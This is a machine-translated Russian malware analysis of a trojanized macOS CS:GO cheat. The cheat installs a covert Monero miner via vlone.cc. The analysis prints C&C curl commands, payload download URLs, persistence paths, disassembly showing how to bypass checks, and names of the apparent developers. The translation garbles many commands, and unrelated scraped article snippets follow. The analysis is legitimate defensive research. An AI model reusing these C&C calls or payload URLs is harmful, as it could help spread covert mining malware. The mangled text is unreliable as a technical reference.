<
  • Главная
Статьи

CS: Go Hacks для Mac

  1. Точка входа: Портал Vlone.cc
  2. Анализ двоичных файлов
  3. vHook
  4. помощник
  5. com.dynamsoft.WebHelper
  6. WebTwainService
  7. minergate-кли
  8. vLoader
  9. Финн и пони

(Источник фото: Pony Strike: Global Offense by FilipinoNinja95 )

Мы недавно нашли Counter-Strike: глобальное наступление (CS: Go) взламывает macOS, которая также является трояном, который может добывать криптовалюты без согласия пользователя.

По данным VirusTotal Retrohunt , угроза находится в дикой природе с начала июля 2017 года.

Предупреждение : на момент написания этой статьи все URL были действующими.

Точка входа: Портал Vlone.cc

Точка входа vlone.cc портал, где пользователь может регистр , Авторизоваться а также Скачать бесплатно взломать инсталлятор .

Доменное имя было зарегистрировано через eNom в апреле 2017 года и разрешается в общий веб-хостинг по названию :

$ dig vlone.cc + короткий 198.54.115.80 $ dig -x 198.54.115.80 + короткий сервер205-2.web-hosting.com.

Сертификат HTTPS был выдан COMODO PositiveSSL в июне 2017 года.

При входе участники могут просматривать Цены Пейдж и купить премиум подписку на 1, 3 или 6 месяцев через Selly :

Пользователи скачивают тот же архив бесплатного установщика, что и гости:

$ curl -s https://vlone.cc/portal/download.php | shasum -a 256 b1bdb4502f5051309582f72a62c14d9919d3c86de3dcfa0b3a5f008cb5a018fe - $ curl -s https://vlone.cc/portal/download.php -G -d пользователь = 1234 -d бесплатно | shasum -a 256 b1bdb4502f5051309582f72a62c14d9919d3c86de3dcfa0b3a5f008cb5a018fe -

Согласно значению пользовательского запроса GET, число участников в августе 2017 года, 22-е, составляет почти две тысячи.

Мы не знаем, если частный установщик взлома также устанавливает программное обеспечение для майнинга без согласия пользователя.

Мы не знаем, если частный установщик взлома также устанавливает программное обеспечение для майнинга без согласия пользователя

Анализ двоичных файлов

Это все код стандартной библиотеки C ++. Использование сетевых подключений Libcurl и безопасный протокол HTTPS.

Все исполняемые файлы, кроме CLI майнера, требуют привилегий суперпользователя, поэтому пользователь должен запустить установщик с помощью sudo:

$ ./vHook Требуется root-доступ! Пожалуйста, введите "sudo ./vhook"

Основной двоичный файл скрывается как Динамический Веб TWAIN , онлайн платформа для сканирования документов.

vHook

vHook является установщиком . Это упаковано с UPX , вероятно, чтобы избежать анализа пользователей и обойти некоторые продукты безопасности.

Это интерфейс командной строки:

$ sudo ./vHook [vlone] vHook public [vlone] Имя пользователя: ИМЯ ПОЛЬЗОВАТЕЛЯ Пароль: ПАРОЛЬ [vlone] Добро пожаловать в vHook Public, ИМЯ ПОЛЬЗОВАТЕЛЯ! [vlone] Загрузка ресурсов vHook .. [vlone] Раздувание ресурсов vHook .. [vlone] CS: GO не работает! [vlone] Уборка ... [vlone] Выход ...

Имея действительную учетную запись участника, он загружает и извлекает bootstrap.dylib и vhook.dylib из https://vlone.cc/portal/gateway.php как assets.zip в / Library / Application Support /:

$ curl -s https://vlone.cc/portal/gateway.php -G -d username = ИМЯ ПОЛЬЗОВАТЕЛЯ -d пароль = ПАРОЛЬ -d бесплатно | xxd -l 64 00000000: 504b 0304 1400 0000 0800 8696 c14a 9c2e PK ........... J .. 00000010: 55c2 b606 0000 1827 0000 0f00 1c00 626f U ......'... ... bo 00000020: 6f74 7374 7261 702e 6479 6c69 6255 5409 otstrap.dylibUT. 00000030: 0003 9cb9 2f59 d339 8059 7578 0b00 0104 .... / Y.9.Yux ....

Он загружает bootstrap.dylib из osxinj проект. Если Counter-Strike: Global Offensive работает, он загружает и извлекает некоторые шрифты (https://vlone.cc/fontfix.zip как vlone.zip в / Library / Fonts /) и внедряет vhook.dylib в процесс csgo_osx64.

Это может быть идеальным вариантом для пользователя CS: GO , но оказывается, что vHook также подлый скачивает и извлекает https://vlone.cc/abc/assets/asset.zip как fonts.zip в / var /, изменяет каталог на / var и запускает sudo ./helper &.

Затем он убивает приложение Terminal, чтобы скрыть вывод отсоединенного процесса.

помощник

помощник - майнер-загрузчик . Это также упаковано с UPX.

Сначала он запрашивает у C & C имя двоичного файла, который будет выполняться при загрузке:

$ curl https://www.vlone.cc/abc/commands/update.php?request -F command = newfile com.dynamsoft.webhelper

Он загружает https://www.vlone.cc/abc/assets/b.zip как /b.zip, извлекает его содержимое в /var/.log/, меняет каталог на /var/.log/ и запускает sudo ./ com.dynamsoft.WebHelper &.

На момент написания этой статьи https://www.vlone.cc/abc/assets/b.zip URL-ответом был код ошибки File Not Found 404, но https://www.vlone.cc/abc/assets/ URL-адрес bz.zip активен и отправьте ожидаемый архив.

com.dynamsoft.WebHelper

com.dynamsoft.WebHelper - загрузчик майнеров . Несмотря на название, оно не связано с Dynamsoft.

Он начинается с загрузки и извлечения:

  • WebTwainService от https://www.vlone.cc/abc/assets/d.zip в /var/.log/
  • com.dynamsoft.WebTwainService.plist из https://www.vlone.cc/abc/assets/p.zip в / Library / LaunchDaemons /

Он загружает демон, отправляет уникальный идентификатор компьютера (UUID) и его версию на сервер C & C и проверяет, соответствует ли онReReirements (), т. Е. Работает от имени пользователя root, а не в отладчике:

$ curl -s https://www.vlone.cc/abc/hub.php?init -F version = 1.2.1 -F hwid = $ (uuidgen) создан, продолжить

Затем он спит в течение одного часа. Если кто-то спешит, он или она может легко отключить сон:

__текст: 0000000100016A5F BF 01 00 00 00 mov edi, 1 800; без знака int __text: 0000000100016A64 E8 5B 72 00 00 вызов _sleep

Отдохнув, он каждую минуту посылает команды на сервер C & C, чтобы спросить, должен ли он добывать и обновлять или убивать себя:

$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F command = mine true $ curl -s https://www.vlone.cc/abc/commands/update.php ? request -F command = update false $ curl -s https://www.vlone.cc/abc/commands/kill.php?request -F command = kill false

Каждую минуту он также создает или обновляет поток майнинга:

  • загрузите и извлеките https://www.vlone.cc/abc/assets/helper.zip в /var/.trash/.assets/
  • получить настройки майнера (максимальный основной номер, валюта, адрес электронной почты)
  • проверьте, работает ли Activity Monitor
  • проверьте, что это уже майнинг
  • проверьте, должен ли он прекратить майнинг
  • запустите cd /var/.trash/.assets/; ./com.apple.SafariHelper с соответствующими аргументами

Подробнее: SENTINELONE - ЛУЧШИЙ AV ДЛЯ MACOS

WebTwainService

WebTwainService пытается позаботиться о постоянстве com.dynamsoft.webhelper. Это снова упаковано с UPX.

Он устанавливает текущий каталог в /var/.log и запускает sudo ./com.dynamsoft.webhelper &, затем рекурсивно спит в течение одного часа…

minergate-кли

com.apple.SafariHelper на самом деле является официальным MinerGate CLI v4.04:

$ Shasum -a 256 MinerGate-кли-4,04-Mac / minergate-кли com.apple.SafariHelper b943369a2ae7afb3522f3b1c40c15208bff0444d47d0df476dd585cf9cbf7c10 MinerGate-кли-4,04-Mac / minergate-кли b943369a2ae7afb3522f3b1c40c15208bff0444d47d0df476dd585cf9cbf7c10 com.apple.SafariHelper

Это написано в Qt Итак, он поставляется с фреймворками:

$ find /private/.trash -type f /private/.trash/.assets/com.apple.SafariHelper /private/.trash/.assets/Frameworks/QtCore.framework/Versions/5/QtCore /private/.trash/ .assets / Frameworks / QtNetwork.framework / Versions / 5 / QtNetwork /private/.trash/.assets/Frameworks/QtSql.framework/Versions/5/QtSql /private/.trash/.assets/Frameworks/QtWebSockets.framework/Versions / 5 / QtWebSockets

Он запрашивает процессор, как того требует com.dynamsoft.WebHelper, поэтому пользователь наслаждается фоновой музыкой поклонников компьютера:

$ ps axu | grep [c] om.apple.SafariHelper root 474 200,0 0,2 2490592 14204 s000 R + 3:07 AM 3: 21,87 ./com.apple.SafariHelper -user [электронная почта защищена] --xmr 2

В этом примере это майнинг Monero (XMR) со всеми ядрами виртуальных машин (два: 200,0%).

Текущий адрес электронной почты MinerGate: [электронная почта защищена] , а также [электронная почта защищена] адрес электронной почты был также найден в другой образец ,

Максимальный номер ядра, CryptoCurrency и адрес электронной почты предоставляются com.dynamsoft.WebHelper и C & C сервером:

$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine = cores 4 $ curl -s https://www.vlone.cc/abc/commands/mine.php ? request -F mine = coin xmr $ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine = электронная почта [электронная почта защищена]

vLoader

Мы наконец-то закончили с vLoader, частный установщик и, опять же, он упакован с UPX.

Он выполняет много проверок на сервере C & C:

$ curl -s https://www.vlone.cc/pwned.php -F user = USERNAME -F pass = ПАРОЛЬ -F hwid = $ (uuidgen) 204 $ curl -s https://www.vlone.cc/ sub.php -F user = USERNAME 00/00/0000

Они тривиальны, чтобы обойти любого, кто может вызвать условный переход:

__text: 0000000100010570 A8 01 test al, 1 __text: 0000000100010572 90 E9 05 00 00 00 jnz loc_10001057D __text: 0000000100010578 E9 08 01 00 00 jmp loc_100010685 __text: 000000010001057D; -------------------------------------------------- ------------------------- __text: 000000010001057D __text: 000000010001057D loc_10001057D:; КОД XREF: dna8o :: in (void) +862 __text: 000000010001057D 48 8B 3D 94 5A 00 00 mov rdi, cs: __ ZNSt3__14coutE_ptr __text: 0000000100010584 48 8D 35 84 53 00 00 lea rsi, aLogged InSucces; "Успешно вошел в систему"

Частные полезные данные загружаются и извлекаются в /var/.old/:

  • boots.dylib от http://vlone.cc/clear/sadmio.zip
  • .uhdexter.dylib из http://vlone.cc/clear/getout.zip

По сравнению с бесплатной внедренной библиотекой закрытый хук очень похож:

vLoader не удаляет ни одну из полезных загрузок бесплатной версии.

Финн и пони

Мы не тратили слишком много времени на обратный инжиниринг vhook.dylib. Исходный код был доступен на GitHub ( архив ) и видео о взломе также доступны на YouTube Вот а также там ,

GitHub владелец проекта vHook - fetusfinn (оригинальный автор VIKING ) и мы случайно нашли символы отладчика, соответствующие имени пользователя Finn, в libvHook.dylib GitHub и во всех проанализированных двоичных файлах:

$ для f в github.com/fetusfinn/vHook/libvHook.dylib \ vHook_unpacked helper_unpacked com.dynamsoft.WebHelper WebTwainService_unpacked do nm -a "$ f" | grep -m 1 Finn сделано 0000000000000000 - 00 0000 SO / Пользователи / Finn / Рабочий стол / c ++ / vHook / 0000000000000000 - 00 0000 SO / Пользователи / Finn / Загрузки / Архив / vloneLoader / 0000000000000000 - 00 0000 SO / Пользователи / Finn / Desktop / pwnednet / pwnednet / installer / installer / 0000000000000000 - 00 0000 SO / Пользователи / Finn / Рабочий стол / pwnednet / pwnednet / pwnednet / 0000000000000000 - 00 0000 SO / Пользователи / Finn / Загрузки / WebTwainService / WebTwainService / WebTwainService /

Вот как мы знаем, что проект Финна называется pwnednet. Сокращенный к pwnet , он походит на пони на французском языке, то есть пони на английском языке, и все любят пони, так что здесь у вас есть OSX.Pwnet.A !

Там также есть ссылка на кого-то по имени Дженнифер Йоханссон в пользовательских данных Xcode:

$ find github.com/fetusfinn/vHook -type f -path "* nnif *" github.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/ jenniferjohansson .xcuserdatad / xcdebugger / Breakpoints_v2.xcbkptvithub.com.com vHook. xcodeproj / xcuserdata / jenniferjohansson.

Мы не нашли время, чтобы спросить парня pwned на Discord , сильно ли Финн любит пони:

Но, на всякий случай, вот Голландский пони для Финна и ее команды.

Из Хакестрии с ❤

РЕДАКТИРОВАТЬ: добавлен vLoader на 2017/08/29.

Похожие

Как проверить IP-адрес роутера и найти пароль для входа
Получили ли вы новое сетевое оборудование, например, в рамках продления контракта или смены интернет-провайдера, и вы не знаете IP-адрес маршрутизатора и не знаете регистрационные данные? Неважно - мы покажем вам, как проверить IP-адрес вашего роутера и где найти данные для панели настроек.
Растровая графика и векторные форматы и графические файлы
Интерактивные агентства, рекламные агентства, СМИ, типографии и другие поставщики требуют, чтобы маркетологи предоставляли графические материалы в самых разных формах. Когда-то им нужны векторные файлы, иногда побитового размера, обычно с приемлемыми форматами в виде трехбуквенных расширений. Они также часто указывают минимальный размер или разрешение растровых изображений, выраженных в пикселях. В этой статье я кратко объясняю разницу между растровыми изображениями и векторами, рассказываю,
Как изменить экран входа в Windows 7
Будь то заставки, обои на рабочий стол или тип и размер шрифта, визуальная настройка на уровне ОС обычно важна для всех пользователей. Признавая это, Microsoft упростила применение и настройку отдельных тем в Windows 7 как никогда. Мы рассмотрели эту тему на прошлой неделе. показывая вам, как найти скрытые темы, скрытые на вашем жестком диске, а также спонсируемые темы, доступные через
Тексты с панели магазина IAI-Shop.com
... com-1" alt="Многие пользователи Интернета получают электронную почту менее 3 раз в неделю"> Многие пользователи Интернета получают электронную почту менее 3 раз в неделю. Вот почему, например, запрос электронной почты, отправленный для оплаты, может быть прочитан покупателем даже через несколько дней после отправки. В это время ничего не происходит, и вы ждете с пакетом, готовым для получения оплаты. Не лучше ли в этой ситуации отправить SMS, которое будет получено, вероятно, через несколько
Что такое мобильные приложения Photoshop Express, Fix, Mix и Sketch?
Подход Adobe к мобильным приложениям выглядит так: «Чем больше, тем лучше». На данный момент для iOS и Android доступно пять приложений под маркой Photoshop. Они включают: Каждое из этих приложений использует различную часть основных функций Photoshop (или Lightroom) и адаптирует
5 бизнес идей для молодых мам
Лукаш Пухальский менеджер академического инкубатора предпринимательства в Познани компания: Экономический университет в Познани Рождение ребенка приносит много изменений в жизни; план дня отменяется, находя момент для себя, часто граничит с чудом. Со временем становится все
Перенос файлов из Windows XP, Vista, 7 или 8 в Windows 10 с помощью Windows Easy Transfer
Планируете ли вы обновить компьютер с Windows XP, Vista, 7 или 8 до Windows 10 или купить новый компьютер с предустановленной Windows 10, вы можете использовать Windows Easy Transfer для копирования всех файлов и настроек со старого компьютера или старой версии. Windows на ваш новый компьютер под управлением Windows 10. В этой статье я расскажу вам, как настроить Windows Easy Transfer. Прежде чем начать, позвольте мне уточнить, что именно вы можете передать с помощью Windows Easy Transfer:
Масштабирование приложений Adobe на экранах с высоким разрешением (FIX)
Недавно я приобрел новый Yoga 2 Pro с великолепным дисплеем 3200 x 1800 . Моими основными целями для этого устройства было сделать тяжелую работу на дороге со многими из моих профессиональных приложений. Я был очень обескуражен, когда впервые запустил Fireworks, Photoshop, Dreamweaver и Illustrator, когда обнаружил, что мне нужна лупа, чтобы увидеть простые пункты меню.
Остановите запуск iTunes при нажатии кнопки Play на клавиатуре вашего Mac
... com"> голос чтобы слушать музыку, и мне не нужен музыкальный проигрыватель Apple / музыкальный магазин / магазин ТВ и фильмов / инструмент резервного копирования iPhone и iPad / рабочий стол в браузере App Store / служба потоковой подписки / каталог подкастов / источник ресурсов. Есть ли какой-нибудь способ остановить это? Как оказалось, да. За эти годы было сделано много хитростей, так как разные методы продолжают ломать новые версии macOS, но вот что работает сейчас. Я протестировал
Три хороших интеллектуальных инструмента для Windows, Mac, Linux, iPhone, iPad и Android
Как вы планируете серию или визуально записываете для всех, как определенные люди, которых вы исследуете, связаны друг с другом? Карты разума очень полезны для такой работы. Начиная с центральной точки, добавляются и связываются дополнительные точки. Большое преимущество по сравнению с простым списком ключевых слов: отдельные точки напрямую связаны друг с другом, и все остается хорошо понятным.
Nintendo Wii U - цифровой литейный тест • Eurogamer.pl
Прошло много времени с момента нашего последнего описания импортного оборудования. К счастью, темные времена, когда премьеры приставок в разных регионах следовали месяцами или годами спустя, стали песней прошлого, но Wii U, новая консоль Nintendo, уже проникла на полки магазинов в США, почти за две недели до европейского дебюта, поэтому всякий раз, когда была возможность иметь его чуть раньше, мы не могли этому противостоять. Здесь мы хотели бы подчеркнуть, что приведенное ниже описание полностью

Комментарии

У вас есть MacBook или другой Apple Mac?
У вас есть MacBook или другой Apple Mac? По умолчанию у вас нет доступа к внешним дискам, USB-ключам и другим подобным носителям, отформатированным с использованием NTFS. Здесь, однако, вы узнаете, как это сделать очень просто. Добро пожаловать! Некоторое время назад я хотел
Com/watch?
com/watch?v=t99BfDnBZcI [3] Главное окно браузера Goggles - google.pl/imghp?hl=en. [4] Chrome Поиск по плагину / Plugin by chrome.google.com/webstore/detail/search-by-image-by-google/dajedkncpodkggklbegccjpmnglmnflm [5] Gooogle поисковик каракули, т.е. додлс - google.com/doodles [6] Dodatek / Plugin - браузер Firefox addons.mozilla.org/pl/firefox/addon/search_by_image/ [7] Плагин / плагин для браузера Chrome Просмотреть изображение - chrome.google.com/webstore/detail/view-image/jpcmhcelnjdmblfmjabdeclccemkghjk

Php?
Php?
Php?
Php ?
Php?
Php?
Php ?
Php?
Есть ли какой-нибудь способ остановить это?
У вас есть MacBook или другой Apple Mac?


Новости
  • Виртуальный хостинг

    Виртуальный хостинг. Возможности сервера распределяются в равной мере между всеми... 
    Читать полностью

  • Редизайн сайта

    Редизайн сайта – это полное либо частичное обновление дизайна существующего сайта.... 
    Читать полностью

  • Консалтинг, услуги контент-менеджера

    Сопровождение любых интернет ресурсов;- Знание HTML и CSS- Поиск и обновление контента;-... 
    Читать полностью

  • Трафик из соцсетей

    Сравнительно дешевый способ по сравнению с поисковым и контекстным видами раскрутки... 
    Читать полностью

  • Поисковая оптимизация

    Поисковая оптимизация (англ. search engine optimization, SEO) — поднятие позиций сайта в результатах... 
    Читать полностью